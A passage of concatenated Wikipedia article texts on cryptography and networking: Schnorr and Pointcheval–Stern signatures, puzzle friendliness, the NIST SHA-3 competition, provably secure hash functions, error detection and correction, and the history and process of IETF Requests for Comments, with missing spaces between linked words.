{\epsilon }_{F}}is noticeably smaller than 1", whereϵF{\displaystyle {\epsilon }_{F}}is the probability of forging an error making at mostqh{\displaystyle q_{h}}queries to the random oracle. The aforementioned process achieves at-bit security level with 4t-bit signatures. For example, a 128-bit security level would require 512-bit (64-byte) signatures. The security is limited by discrete logarithm attacks on the group, which have a complexity of thesquare-rootof the group size. In Schnorr's original 1991 paper, it was suggested that since collision resistance in the hash is not required, shorter hash functions may be just as secure, and indeed recent developments suggest that at-bit security level can be achieved with 3t-bit signatures.[6]Then, a 128-bit security level would require only 384-bit (48-byte) signatures, and this could be achieved by truncating the size ofeuntil it is half the length of thesbitfield. Schnorr signature is used by numerous products. A notable usage is the deterministic Schnorr's signature using the secp256k1elliptic curveforBitcointransaction signature after the Taproot update.[7]
https://en.wikipedia.org/wiki/Schnorr_signature
Incryptography, thePointcheval–Stern signature algorithmis adigital signaturescheme based on the closely relatedElGamal signature scheme. It changes the ElGamal scheme slightly to produce an algorithm which has been proven secure in a strong sense againstadaptive chosen-message attacks, assuming thediscrete logarithm problemis intractable in a strong sense.[1][2] David PointchevalandJacques Sterndeveloped theforking lemmatechnique in constructing their proof for this algorithm. It has been used in other security investigations of various cryptographic algorithms. This cryptography-related article is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Pointcheval%E2%80%93Stern_signature_algorithm
Incryptography,puzzle friendlinessis a property ofcryptographic hash functions. Not all cryptographic hash functions have this property.SHA-256is a cryptographic hash function that has this property. Informally, a hash function is puzzle friendly if no solution exists, which is better than just making random guesses and the only way to find a solution is thebrute force method. Although the property is very general, it is of particular importance to proof-of-work, such as inBitcoin mining.[1] Here is the formal technical definition of the puzzle friendliness property.[2][1] In the above definition, the distribution has high min-entropy means that the distribution from whichkis chosen is hugely distributed so that choosing some particular random value from the distribution has only a negligible probability. LetHbe a cryptographic hash function and let an outputybe given. Let it be required to findzsuch thatH(z) =y. Let us also assume that a part of the stringz, sayk, is known. Then, the problem of determiningzboils down to findingxthat should be concatenated withkto getz. The problem of determiningxcan be thought of apuzzle. It is really a puzzle only if the task of findingxis nontrivial and is nearly infeasible. Thus the puzzle friendliness property of a cryptographic hash function makes the problem of findingxcloser to being a real puzzle. The puzzle friendliness property of cryptographic hash functions is used in Bitcoin mining.
https://en.wikipedia.org/wiki/Puzzle_friendliness
TheNIST hash function competitionwas an open competition held by the USNational Institute of Standards and Technology(NIST) to develop a newhash functioncalledSHA-3to complement the olderSHA-1andSHA-2. The competition was formally announced in theFederal Registeron November 2, 2007.[1]"NIST is initiating an effort to develop one or more additional hash algorithms through a public competition, similar to thedevelopment processfor theAdvanced Encryption Standard(AES)."[2]The competition ended on October 2, 2012, when NIST announced thatKeccakwould be the new SHA-3 hash algorithm.[3] The winning hash function has been published as NIST FIPS 202 the "SHA-3 Standard", to complement FIPS 180-4, theSecure Hash Standard. The NIST competition has inspired other competitions such as thePassword Hashing Competition. Submissions were due October 31, 2008 and the list of candidates accepted for the first round was published on December 9, 2008.[4]NIST held a conference in late February 2009 where submitters presented their algorithms and NIST officials discussed criteria for narrowing down the field of candidates for Round 2.[5]The list of 14 candidates accepted to Round 2 was published on July 24, 2009.[6]Another conference was held on August 23–24, 2010 (afterCRYPTO2010) at theUniversity of California, Santa Barbara, where the second-round candidates were discussed.[7]The announcement of the final round candidates occurred on December 10, 2010.[8]On October 2, 2012, NIST announced its winner, choosingKeccak, created by Guido Bertoni, Joan Daemen, and Gilles Van Assche of STMicroelectronics and Michaël Peeters of NXP.[3] This is an incomplete list of known submissions. NIST selected 51 entries for round 1.[4]14 of them advanced to round 2,[6]from which 5 finalists were selected. The winner was announced to beKeccakon October 2, 2012.[9] NIST selected five SHA-3 candidate algorithms to advance to the third (and final) round:[10] NIST noted some factors that figured into its selection as it announced the finalists:[11] NIST has released a report explaining its evaluation algorithm-by-algorithm.[12][13][14] The following hash function submissions were accepted for round two, but did not make it to the final round. As noted in the announcement of the finalists, "none of these candidates was clearly broken". The following hash function submissions were accepted for round one but did not pass to round two. They have neither been conceded by the submitters nor have had substantial cryptographic weaknesses. However, most of them have some weaknesses in the design components, or performance issues. The following non-conceded round one entrants have had substantial cryptographic weaknesses announced: The following round one entrants have been officially retracted from the competition by their submitters; they are considered broken according to the NIST official round one candidates web site.[54]As such, they are withdrawn from the competition. Several submissions received by NIST were not accepted as first-round candidates, following an internal review by NIST.[4]In general, NIST gave no details as to why each was rejected. NIST also has not given a comprehensive list of rejected algorithms; there are known to be 13,[4][68]but only the following are public.
https://en.wikipedia.org/wiki/NIST_hash_function_competition
Incryptography,cryptographic hash functionscan be divided into two main categories. In the first category are those functions whose designs are based on mathematical problems, and whose security thus follows from rigorous mathematical proofs,complexity theoryandformal reduction. These functions are calledprovably secure cryptographic hash functions. To construct these is very difficult, and few examples have been introduced. Their practical use is limited. In the second category are functions which are not based on mathematical problems, but on an ad-hoc constructions, in which the bits of the message are mixed to produce the hash. These are then believed to be hard to break, but no formal proof is given. Almost all hash functions in widespread use reside in this category. Some of these functions are already broken, and are no longer in use.SeeHash function security summary. Generally, thebasicsecurity ofcryptographic hash functionscan be seen from different angles: pre-image resistance, second pre-image resistance, collision resistance, and pseudo-randomness. The basic question is the meaning ofhard. There are two approaches to answer this question. First is the intuitive/practical approach: "hardmeans that it is almost certainly beyond the reach of any adversary who must be prevented from breaking the system for as long as the security of the system is deemed important." The second approach is theoretical and is based on thecomputational complexity theory: if problemAis hard, then there exists a formalsecurity reductionfrom a problem which is widely considered unsolvable inpolynomial time, such asinteger factorizationor thediscrete logarithmproblem. However, non-existence of a polynomial time algorithm does not automatically ensure that the system is secure. The difficulty of a problem also depends on its size. For example,RSA public-key cryptography(which relies on the difficulty ofinteger factorization) is considered secure only with keys that are at least 2048 bits long, whereas keys for theElGamal cryptosystem(which relies on the difficulty of thediscrete logarithmproblem) are commonly in the range of 256–512 bits. If the set of inputs to the hash is relatively small or is ordered by likelihood in some way, then a brute force search may be practical, regardless of theoretical security. The likelihood of recovering the preimage depends on the input set size and the speed or cost of computing the hash function. A common example is the use of hashes to storepasswordvalidation data. Rather than store the plaintext of user passwords, an access control system typically stores a hash of the password. When a person requests access, the password they submit is hashed and compared with the stored value. If the stored validation data is stolen, then the thief will only have the hash values, not the passwords. However, most users choose passwords in predictable ways, and passwords are often short enough so that all possible combinations can be tested if fast hashes are used.[1]Special hashes calledkey derivation functionshave been created to slow searches.SeePassword cracking. Most hash functions are built on an ad-hoc basis, where the bits of the message are nicely mixed to produce the hash. Variousbitwise operations(e.g. rotations),modular additions, andcompression functionsare used in iterative mode to ensure high complexity and pseudo-randomness of the output. In this way, the security is very hard to prove and the proof is usually not done. Only a few years ago[when?], one of the most popular hash functions,SHA-1, was shown to be less secure than its length suggested: collisions could be found in only 251[2]tests, rather than the brute-force number of 280. In other words, most of the hash functions in use nowadays are not provably collision-resistant. These hashes are not based on purely mathematical functions. This approach results generally in more effective hashing functions, but with the risk that a weakness of such a function will be eventually used to find collisions. One famous case isMD5. In this approach, the security of a hash function is based on some hard mathematical problem, and it is proved that finding collisions of the hash function is as hard as breaking the underlying problem. This gives a somewhat stronger notion of security than just relying on complex mixing of bits as in the classical approach. A cryptographic hash function hasprovable security against collision attacksif finding collisions is provablypolynomial-time reduciblefrom a problemPwhich is supposed to be unsolvable in polynomial time. The function is then called provably secure, or just provable. It means that if finding collisions would be feasible in polynomial time by algorithmA, then one could find and use polynomial time algorithmR(reduction algorithm) that would use algorithmAto solve problemP, which is widely supposed to be unsolvable in polynomial time. That is a contradiction. This means that finding collisions cannot be easier than solvingP. However, this only indicates that finding collisions is difficult insomecases, as not all instances of a computationally hard problem are typically hard. Indeed, very large instances of NP-hard problems are routinely solved, while only the hardest are practically impossible to solve. Examples of problems that are assumed to be not solvable in polynomial time include SWIFFTis an example of a hash function that circumvents these security problems. It can be shown that, for any algorithm that can break SWIFFT with probabilitypwithin an estimated timet, one can find an algorithm that solves theworst-casescenario of a certain difficult mathematical problem within timet′depending ontandp.[citation needed] Lethash(m) =xmmodn, wherenis a hard-to-factor composite number, andxis some prespecified base value. A collisionxm1≡xm2(modn)reveals a multiplem1−m2of themultiplicative orderofxmodulon. This information can be used to factornin polynomial time, assuming certain properties ofx. But the algorithm is quite inefficient because it requires on average 1.5 multiplications modulonper message-bit.
https://en.wikipedia.org/wiki/Provably_secure_cryptographic_hash_function
Ininformation theoryandcoding theorywith applications incomputer scienceandtelecommunications,error detection and correction(EDAC) orerror controlare techniques that enablereliable deliveryofdigital dataover unreliablecommunication channels. Many communication channels are subject tochannel noise, and thus errors may be introduced during transmission from the source to a receiver. Error detection techniques allow detecting such errors, while error correction enables reconstruction of the original data in many cases. Error detectionis the detection of errors caused by noise or other impairments during transmission from the transmitter to the receiver. Error correctionis the detection of errors and reconstruction of the original, error-free data. In classical antiquity,copyistsof theHebrew Biblewere paid for their work according to the number ofstichs(lines of verse). As the prose books of the Bible were hardly ever written in stichs, the copyists, in order to estimate the amount of work, had to count the letters.[1]This also helped ensure accuracy in the transmission of the text with the production of subsequent copies.[2][3]Between the 7th and 10th centuries CE agroup of Jewish scribesformalized and expanded this to create theNumerical Masorahto ensure accurate reproduction of the sacred text. It included counts of the number of words in a line, section, book and groups of books, noting the middle stich of a book, word use statistics, and commentary.[1]Standards became such that a deviation in even a single letter in a Torah scroll was considered unacceptable.[4]The effectiveness of their error correction method was verified by the accuracy of copying through the centuries demonstrated by discovery of theDead Sea Scrollsin 1947–1956, dating fromc.150 BCE-75 CE.[5] The modern development oferror correction codesis credited toRichard Hammingin 1947.[6]A description ofHamming's codeappeared inClaude Shannon'sA Mathematical Theory of Communication[7]and was quickly generalized byMarcel J. E. Golay.[8] All error-detection and correction schemes add someredundancy(i.e., some extra data) to a message, which receivers can use to check consistency of the delivered message and to recover data that has been determined to be corrupted. Error detection and correction schemes can be eithersystematicor non-systematic. In a systematic scheme, the transmitter sends the original (error-free) data and attaches a fixed number ofcheck bits(orparity data), which are derived from the data bits by some encoding algorithm. If error detection is required, a receiver can simply apply the same algorithm to the received data bits and compare its output with the received check bits; if the values do not match, an error has occurred at some point during the transmission. If error correction is required, a receiver can apply the decoding algorithm to the received data bits and the received check bits to recover the original error-free data. In a system that uses a non-systematic code, the original message is transformed into an encoded message carrying the same information and that has at least as many bits as the original message. Good error control performance requires the scheme to be selected based on the characteristics of the communication channel. Commonchannel modelsincludememorylessmodels where errors occur randomly and with a certain probability, and dynamic models where errors occur primarily inbursts. Consequently, error-detecting and -correcting codes can be generally distinguished betweenrandom-error-detecting/correctingandburst-error-detecting/correcting. Some codes can also be suitable for a mixture of random errors and burst errors. If the channel characteristics cannot be determined, or are highly variable, an error-detection scheme may be combined with a system for retransmissions of erroneous data. This is known asautomatic repeat request(ARQ), and is most notably used in the Internet. An alternate approach for error control ishybrid automatic repeat request(HARQ), which is a combination of ARQ and error-correction coding. There are three major types of error correction:[9] Automatic repeat request(ARQ) is an error control method for data transmission that makes use of error-detection codes, acknowledgment and/or negative acknowledgment messages, andtimeoutsto achieve reliable data transmission. Anacknowledgmentis a message sent by the receiver to indicate that it has correctly received adata frame. Usually, when the transmitter does not receive the acknowledgment before the timeout occurs (i.e., within a reasonable amount of time after sending the data frame), it retransmits the frame until it is either correctly received or the error persists beyond a predetermined number of retransmissions. Three types of ARQ protocols areStop-and-wait ARQ,Go-Back-N ARQ, andSelective Repeat ARQ. ARQ is appropriate if the communication channel has varying or unknowncapacity, such as is the case on the Internet. However, ARQ requires the availability of aback channel, results in possibly increasedlatencydue to retransmissions, and requires the maintenance of buffers and timers for retransmissions, which in the case ofnetwork congestioncan put a strain on the server and overall network capacity.[10] For example, ARQ is used on shortwave radio data links in the form ofARQ-E, or combined with multiplexing asARQ-M. Forward error correction(FEC) is a process of addingredundant datasuch as anerror-correcting code(ECC) to a message so that it can be recovered by a receiver even when a number of errors (up to the capability of the code being used) are introduced, either during the process of transmission or on storage. Since the receiver does not have to ask the sender for retransmission of the data, abackchannelis not required in forward error correction. Error-correcting codes are used inlower-layercommunication such ascellular network, high-speedfiber-optic communicationandWi-Fi,[11][12]as well as for reliable storage in media such asflash memory,hard diskandRAM.[13] Error-correcting codes are usually distinguished betweenconvolutional codesandblock codes: Shannon's theoremis an important theorem in forward error correction, and describes the maximuminformation rateat which reliable communication is possible over a channel that has a certain error probability orsignal-to-noise ratio(SNR). This strict upper limit is expressed in terms of thechannel capacity. More specifically, the theorem says that there exist codes such that with increasing encoding length the probability of error on adiscrete memoryless channelcan be made arbitrarily small, provided that thecode rateis smaller than the channel capacity. The code rate is defined as the fractionk/nofksource symbols andnencoded symbols. The actual maximum code rate allowed depends on the error-correcting code used, and may be lower. This is because Shannon's proof was only of existential nature, and did not show how to construct codes that are both optimal and haveefficientencoding and decoding algorithms. Hybrid ARQis a combination of ARQ and forward error correction. There are two basic approaches:[10] The latter approach is particularly attractive on anerasure channelwhen using arateless erasure code. Error detection is most commonly realized using a suitablehash function(or specifically, achecksum,cyclic redundancy checkor other algorithm). A hash function adds a fixed-lengthtagto a message, which enables receivers to verify the delivered message by recomputing the tag and comparing it with the one provided. There exists a vast variety of different hash function designs. However, some are of particularly widespread use because of either their simplicity or their suitability for detecting certain kinds of errors (e.g., the cyclic redundancy check's performance in detectingburst errors). A random-error-correcting code based onminimum distance codingcan provide a strict guarantee on the number of detectable errors, but it may not protect against apreimage attack. Arepetition codeis a coding scheme that repeats the bits across a channel to achieve error-free communication. Given a stream of data to be transmitted, the data are divided into blocks of bits. Each block is transmitted some predetermined number of times. For example, to send the bit pattern1011, the four-bit block can be repeated three times, thus producing1011 1011 1011. If this twelve-bit pattern was received as1010 1011 1011– where the first block is unlike the other two – an error has occurred. A repetition code is very inefficient and can be susceptible to problems if the error occurs in exactly the same place for each group (e.g.,1010 1010 1010in the previous example would be detected as correct). The advantage of repetition codes is that they are extremely simple, and are in fact used in some transmissions ofnumbers stations.[14][15] Aparity bitis a bit that is added to a group of source bits to ensure that the number of set bits (i.e., bits with value 1) in the outcome is even or odd. It is a very simple scheme that can be used to detect single or any other odd number (i.e., three, five, etc.) of errors in the output. An even number of flipped bits will make the parity bit appear correct even though the data is erroneous. Parity bits added to eachwordsent are calledtransverse redundancy checks, while those added at the end of a stream ofwordsare calledlongitudinal redundancy checks. For example, if each of a series of m-bitwordshas a parity bit added, showing whether there were an odd or even number of ones in that word, any word with a single error in it will be detected. It will not be known where in the word the error is, however. If, in addition, after each stream of n words a parity sum is sent, each bit of which shows whether there were an odd or even number of ones at that bit-position sent in the most recent group, the exact position of the error can be determined and the error corrected. This method is only guaranteed to be effective, however, if there are no more than 1 error in every group of n words. With more error correction bits, more errors can be detected and in some cases corrected. There are also other bit-grouping techniques. Achecksumof a message is amodular arithmeticsum of message code words of a fixed word length (e.g., byte values). The sum may be negated by means of aones'-complementoperation prior to transmission to detect unintentional all-zero messages. Checksum schemes include parity bits,check digits, andlongitudinal redundancy checks. Some checksum schemes, such as theDamm algorithm, theLuhn algorithm, and theVerhoeff algorithm, are specifically designed to detect errors commonly introduced by humans in writing down or remembering identification numbers. Acyclic redundancy check(CRC) is a non-securehash functiondesigned to detect accidental changes to digital data in computer networks. It is not suitable for detecting maliciously introduced errors. It is characterized by specification of agenerator polynomial, which is used as thedivisorin apolynomial long divisionover afinite field, taking the input data as thedividend. Theremainderbecomes the result. A CRC has properties that make it well suited for detectingburst errors. CRCs are particularly easy to implement in hardware and are therefore commonly used incomputer networksand storage devices such ashard disk drives. The parity bit can be seen as a special-case 1-bit CRC. The output of acryptographic hash function, also known as amessage digest, can provide strong assurances aboutdata integrity, whether changes of the data are accidental (e.g., due to transmission errors) or maliciously introduced. Any modification to the data will likely be detected through a mismatching hash value. Furthermore, given some hash value, it is typically infeasible to find some input data (other than the one given) that will yield the same hash value. If an attacker can change not only the message but also the hash value, then akeyed hashormessage authentication code(MAC) can be used for additional security. Without knowing the key, it is not possible for the attacker to easily or conveniently calculate the correct keyed hash value for a modified message. Digital signatures can provide strong assurances about data integrity, whether the changes of the data are accidental or maliciously introduced. Digital signatures are perhaps most notable for being part of the HTTPS protocol for securely browsing the web. Any error-correcting code can be used for error detection. A code withminimumHamming distance,d, can detect up tod− 1 errors in a code word. Using minimum-distance-based error-correcting codes for error detection can be suitable if a strict limit on the minimum number of errors to be detected is desired. Codes with minimum Hamming distanced= 2 are degenerate cases of error-correcting codes and can be used to detect single errors. The parity bit is an example of a single-error-detecting code. Applications that require low latency (such as telephone conversations) cannot useautomatic repeat request(ARQ); they must useforward error correction(FEC). By the time an ARQ system discovers an error and re-transmits it, the re-sent data will arrive too late to be usable. Applications where the transmitter immediately forgets the information as soon as it is sent (such as most television cameras) cannot use ARQ; they must use FEC because when an error occurs, the original data is no longer available. Applications that use ARQ must have areturn channel; applications having no return channel cannot use ARQ. Applications that require extremely low error rates (such as digital money transfers) must use ARQ due to the possibility of uncorrectable errors with FEC. Reliability and inspection engineering also make use of the theory of error-correcting codes,[16]as well as natural language.[17] In a typicalTCP/IPstack, error control is performed at multiple levels: The development of error-correction codes was tightly coupled with the history of deep-space missions due to the extreme dilution of signal power over interplanetary distances, and the limited power availability aboard space probes. Whereas early missions sent their data uncoded, starting in 1968, digital error correction was implemented in the form of (sub-optimally decoded)convolutional codesandReed–Muller codes.[18]The Reed–Muller code was well suited to the noise the spacecraft was subject to (approximately matching abell curve), and was implemented for the Mariner spacecraft and used on missions between 1969 and 1977. TheVoyager 1andVoyager 2missions, which started in 1977, were designed to deliver color imaging and scientific information fromJupiterandSaturn.[19]This resulted in increased coding requirements, and thus, the spacecraft were supported by (optimallyViterbi-decoded) convolutional codes that could beconcatenatedwith an outerGolay (24,12,8) code. The Voyager 2 craft additionally supported an implementation of aReed–Solomon code. The concatenated Reed–Solomon–Viterbi (RSV) code allowed for very powerful error correction, and enabled the spacecraft's extended journey toUranusandNeptune. After ECC system upgrades in 1989, both crafts used V2 RSV coding. TheConsultative Committee for Space Data Systemscurrently recommends usage of error correction codes with performance similar to the Voyager 2 RSV code as a minimum. Concatenated codes are increasingly falling out of favor with space missions, and are replaced by more powerful codes such asTurbo codesorLDPC codes. The different kinds of deep space and orbital missions that are conducted suggest that trying to find a one-size-fits-all error correction system will be an ongoing problem. For missions close to Earth, the nature of thenoisein thecommunication channelis different from that which a spacecraft on an interplanetary mission experiences. Additionally, as a spacecraft increases its distance from Earth, the problem of correcting for noise becomes more difficult. The demand for satellitetransponderbandwidth continues to grow, fueled by the desire to deliver television (including new channels andhigh-definition television) and IP data. Transponder availability and bandwidth constraints have limited this growth. Transponder capacity is determined by the selectedmodulationscheme and the proportion of capacity consumed by FEC. Error detection and correction codes are often used to improve the reliability of data storage media.[20]A parity track capable of detecting single-bit errors was present on the firstmagnetic tape data storagein 1951. Theoptimal rectangular codeused ingroup coded recordingtapes not only detects but also corrects single-bit errors. Somefile formats, particularlyarchive formats, include a checksum (most oftenCRC32) to detect corruption and truncation and can employ redundancy orparity filesto recover portions of corrupted data.Reed-Solomon codesare used incompact discsto correct errors caused by scratches. Modern hard drives use Reed–Solomon codes to detect and correct minor errors in sector reads, and to recover corrupted data from failing sectors and store that data in the spare sectors.[21]RAIDsystems use a variety of error correction techniques to recover data when a hard drive completely fails. Filesystems such asZFSorBtrfs, as well as someRAIDimplementations, supportdata scrubbingand resilvering, which allows bad blocks to be detected and (hopefully) recovered before they are used.[22]The recovered data may be re-written to exactly the same physical location, to spare blocks elsewhere on the same piece of hardware, or the data may be rewritten onto replacement hardware. Dynamic random-access memory(DRAM) may provide stronger protection againstsoft errorsby relying on error-correcting codes. Such error-correcting memory, known asECCorEDAC-protectedmemory, is particularly desirable for mission-critical applications, such as scientific computing, financial, medical, etc. as well as extraterrestrial applications due to the increasedradiationin space. Error-correcting memory controllers traditionally useHamming codes, although some usetriple modular redundancy.Interleavingallows distributing the effect of a single cosmic ray potentially upsetting multiple physically neighboring bits across multiple words by associating neighboring bits to different words. As long as asingle-event upset(SEU) does not exceed the error threshold (e.g., a single error) in any particular word between accesses, it can be corrected (e.g., by a single-bit error-correcting code), and the illusion of an error-free memory system may be maintained.[23] In addition to hardware providing features required for ECC memory to operate,operating systemsusually contain related reporting facilities that are used to provide notifications when soft errors are transparently recovered. One example is theLinux kernel'sEDACsubsystem (previously known asBluesmoke), which collects the data from error-checking-enabled components inside a computer system; besides collecting and reporting back the events related to ECC memory, it also supports other checksumming errors, including those detected on thePCI bus.[24][25][26]A few systems[specify]also supportmemory scrubbingto catch and correct errors early before they become unrecoverable.
https://en.wikipedia.org/wiki/Error_detection_and_correction
ARequest for Comments(RFC) is a publication in a series from the principal technical development and standards-setting bodies for theInternet, most prominently theInternet Engineering Task Force(IETF).[1][2]An RFC is authored by individuals or groups of engineers andcomputer scientistsin the form of amemorandumdescribing methods, behaviors, research, or innovations applicable to the working of the Internet and Internet-connected systems. It is submitted either forpeer reviewor to convey new concepts, information, or, occasionally, engineering humor.[3] The IETF adopts some of the proposals published as RFCs asInternet Standards. However, many RFCs are informational or experimental in nature and are not standards.[4]The RFC system was invented bySteve Crockerin 1969 to help record unofficial notes on the development ofARPANET. RFCs have since become official documents of Internetspecifications,communications protocols, procedures, and events.[5]According to Crocker, the documents "shape the Internet's inner workings and have played a significant role in its success," but are not widely known outside the community.[6] Outside of the Internet community, other documents also calledrequests for commentshave been published, as inU.S. Federal governmentwork, such as theNational Highway Traffic Safety Administration.[7] The inception of the RFC format occurred in 1969 as part of the seminalARPANETproject.[6]Today, it is the official publication channel for theInternet Engineering Task Force(IETF), theInternet Architecture Board(IAB), and – to some extent – the global community of computer network researchers in general. The authors of the first RFCstypewrotetheir work and circulatedhard copiesamong theARPAresearchers. Unlike the modern RFCs, many of the early RFCs were actual Requests for Comments and were titled as such to avoid sounding too declarative and to encourage discussion.[8][9]The RFC leaves questions open and is written in a less formal style. This less formal style is now typical ofInternet Draftdocuments, the precursor step before being approved as an RFC. In December 1969, researchers began distributing new RFCs via the newly operational ARPANET.RFC1, titled "Host Software", was written bySteve Crockerof theUniversity of California, Los Angeles(UCLA), and published on April 7, 1969.[10]Although written by Steve Crocker, the RFC had emerged from an earlyworking groupdiscussion between Steve Crocker, Steve Carr, andJeff Rulifson. InRFC3, which first defined the RFC series, Crocker started attributing the RFC series to the Network Working Group. Rather than being a formal committee, it was a loose association of researchers interested in the ARPANET project. In effect, it included anyone who wanted to join the meetings and discussions about the project. Many of the subsequent RFCs of the 1970s also came from UCLA, because UCLA is one of the first of what wereInterface Message Processors(IMPs) on ARPANET. TheAugmentation Research Center(ARC) atStanford Research Institute, directed byDouglas Engelbart, is another of the four first of what were ARPANETnodesand the source of early RFCs. The ARC became the first network information center (InterNIC), which was managed byElizabeth J. Feinlerto distribute the RFCs along with other network information.[11] OnApril Fools' Day1978,RFC748was published as a parody of theTCP/IPdocumentation style. This resumed in 1989 with the publication ofRFC1097, which describes an option fortelnetclients to displaysubliminal messages. SubsequentApril Fools' Day RFCshave been published annually since then, notablyRFC2324which describes theHyper Text Coffee Pot Control Protocoland defines the HTTP 418 "I'm a teapot" status. Humorous RFCs date back toRFC439, published in January 1973. From 1969 until 1998,Jon Postelserved as the RFCeditor. On his death in 1998, his obituary was published asRFC2468.[12] Following the expiration of the original ARPANET contract with the U.S. federal government, the Internet Society, acting on behalf of the IETF, contracted with the Networking Division of theUniversity of Southern California(USC)Information Sciences Institute(ISI) to assume the editorship and publishing responsibilities under the direction of the IAB. Sandy Ginoza joined USC/ISI in 1999 to work on RFC editing, and Alice Hagens in 2005.[13]Bob Bradentook over the role of RFC project lead, whileJoyce K. Reynoldscontinued to be part of the team until October 13, 2006. In July 2007,streamsof RFCs were defined, so that the editing duties could be divided. IETF documents came from IETF working groups or submissions sponsored by an IETF area director from theInternet Engineering Steering Group. The IAB can publish its own documents. A research stream of documents comes from theInternet Research Task Force(IRTF), and an independent stream from other outside sources.[14]A new model was proposed in 2008, refined, and published in August 2009, splitting the task into several roles,[15]including the RFC Series Advisory Group (RSAG). The model was updated in 2012,[16], and 2020.[17]The streams were also refined in December 2009, with standards defined for their style.[18]In January 2010, the RFC Editor function was moved to a contractor, Association Management Solutions, with Glenn Kowack serving as interim series editor.[19]In late 2011, Heather Flanagan was hired as the permanent RFC Series Editor (RSE). Also at that time, an RFC Series Oversight Committee (RSOC) was created.[20] In 2020, the IAB convened the RFC Editor Future Development program to discuss potential changes to the RFC Editor model. The results of the program were included the RFC Editor Model (Version 3) as defined inRFC9280, published in June 2022.[1]Generally, the new model is intended to clarify responsibilities and processes for defining and implementing policies related to the RFC series and the RFC Editor function. Changes in the new model included establishing the position of the RFC Consulting Editor, the RFC Series Working Group (RSWG), and the RFC Series Approval Board (RSAB). It also established a new Editorial Stream for the RFC Series and concluded the RSOC. The role of the RSE was changed to the RFC Series Consulting Editor (RSCE). In September 2022, Alexis Rossi was appointed to that position.[21] Requests for Comments were originally produced in non-reflowabletext format. In August 2019, the format was changed so that new documents can be viewed optimally in devices with varying display sizes.[22] The RFC Editor assigns each RFC aserial number. Once assigned a number and published, an RFC is never rescinded or modified; if the document requires amendments, the authors publish a revised document. Therefore, some RFCs supersede others; the superseded RFCs are said to bedeprecated,obsolete, orobsoleted bythe superseding RFC. Together, the serialized RFCs compose a continuous historical record of the evolution of Internet standards and practices. The RFC process is documented inRFC2026(The Internet Standards Process, Revision 3).[23] The RFC production process differs from thestandardizationprocess of formal standards organizations such asInternational Organization for Standardization(ISO). Internet technology experts may submit anInternet Draftwithout support from an external institution. Standards-track RFCs are published with approval from the IETF, and are usually produced by experts participating inIETF Working Groups, which first publish an Internet Draft. This approach facilitates initial rounds of peer review before documents mature into RFCs.[24] The RFC tradition of pragmatic, experience-driven, after-the-fact standards authorship accomplished by individuals or small working groups can have important advantages[clarification needed]over the more formal, committee-driven process typical of ISO and national standards bodies.[25] Most RFCs use a common set of terms such as "MUST" and "NOT RECOMMENDED" (as defined byRFC2119and8174),augmented Backus–Naur form(ABNF) (RFC5234) as a meta-language, and simple text-based formatting, in order to keep the RFCs consistent and easy to understand.[23] The RFC series contains three sub-series forIETFRFCs: BCP, FYI, and STD. Best Current Practice (BCP) is a sub-series of mandatory IETF RFCs not on standards track. For Your Information (FYI) is a sub-series of informational RFCs promoted by the IETF as specified inRFC1150(FYI 1). In 2011,RFC6360obsoleted FYI 1 and concluded this sub-series. Standard (STD) used to be the third and highest maturity level of the IETF standards track specified inRFC2026(BCP 9). In 2011RFC6410(a new part of BCP 9) reduced the standards track to two maturity levels.[citation needed] There are five streams of RFCs:IETF,IRTF,IAB,independent submission,[26]andEditorial. Only the IETF creates BCPs and RFCs on the standards track. The IAB publishes informational documents relating to policy or architecture. The IRTF publishes the results of research, either as informational documents or as experiments. Independent submissions are published at the discretion of the Independent Submissions Editor. Non-IETF documents are reviewed by theIESGfor conflicts with IETF work. IRTF andindependentRFCs generally contain relevant information or experiments for the Internet at large not in conflict with IETF work. compareRFC4846,5742and5744.[27][28]The Editorial Stream is used to effect editorial policy changes across the RFC series (seeRFC9280).[1] The official source for RFCs on theWorld Wide Webis the RFC Datatracker. Almost any published RFC can be retrieved via aURLof the form https://datatracker.ietf.org/doc/html/rfc5000, shown forRFC5000. Every RFC is submitted as plainASCIItext and is published in that form, but may also be available in otherformats. For easy access to the metadata of an RFC, including abstract, keywords, author(s), publication date, errata, status, and especially later updates, the RFC Editor site offers a search form with many features. A redirection sets some efficient parameters, example: rfc:5000.[4] The officialInternational Standard Serial Number(ISSN) of the RFC series is 2070-1721.[18] Not all RFCs are standards.[29]Each RFC is assigned a designation with regard to status within the Internet standardization process. This status is one of the following:Informational,Experimental,Best Current Practice,Standards Track, orHistoric.[30] Once submitted, accepted, and published, an RFC cannot be changed. Errata may be submitted, which are published separately. More significant changes require a new submission which will receive a new serial number.[31] Standards track documents are further divided intoProposed StandardandInternet Standarddocuments.[32] Only the IETF, represented by theInternet Engineering Steering Group(IESG), can approvestandards-trackRFCs. If an RFC becomes an Internet Standard (STD), it is assigned an STD number but retains its RFC number. The definitive list of Internet Standards is the Official Internet Protocol Standards. Previously STD 1 used to maintain a snapshot of the list.[33] When an Internet Standard is updated, its STD number stays the same, now referring to a new RFC or set of RFCs. A given Internet Standard, STDn, may be RFCsxandyat a given time, but later the same standard may be updated to be RFCzinstead. For example, in 2007RFC3700was an Internet Standard—STD 1—and in May 2008 it was replaced withRFC5000, soRFC3700changed toHistoric,RFC5000became an Internet Standard, and as of May 2008[update]STD 1 isRFC5000. as of December 2013[update]RFC5000is replaced byRFC7100, updatingRFC2026to no longer use STD 1. (Best Current Practices work in a similar fashion; BCPnrefers to a certain RFC or set of RFCs, but which RFC or RFCs may change over time). An informational RFC can be nearly anything fromApril 1 jokesto widely recognized essential RFCs likeDomain Name SystemStructure and Delegation (RFC1591). Some informational RFCs formed theFYIsub-series. An experimental RFC can be an IETF document or an individual submission to the RFC Editor. A draft is designated experimental if it is unclear the proposal will work as intended or unclear if the proposal will be widely adopted. An experimental RFC may be promoted to standards track if it becomes popular and works well.[34] TheBest Current Practicesubseries collects administrative documents and other texts which are considered as official rules and not onlyinformational, but which do not affectover the wire data. The border between standards track and BCP is often unclear. If a document only affects the Internet Standards Process, like BCP 9,[35]or IETF administration, it is clearly a BCP. If it only defines rules and regulations forInternet Assigned Numbers Authority(IANA) registries it is less clear; most of these documents are BCPs, but some are on the standards track. The BCP series also covers technical recommendations for how to practice Internet standards; for instance, the recommendation to use source filtering to makeDoS attacksmore difficult (RFC2827: "Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing") isBCP 38. AhistoricRFC is one that the technology defined by the RFC is no longer recommended for use, which differs from "Obsoletes" header in a replacement RFC. For example,RFC821(SMTP) itself is obsoleted by various newer RFCs, but 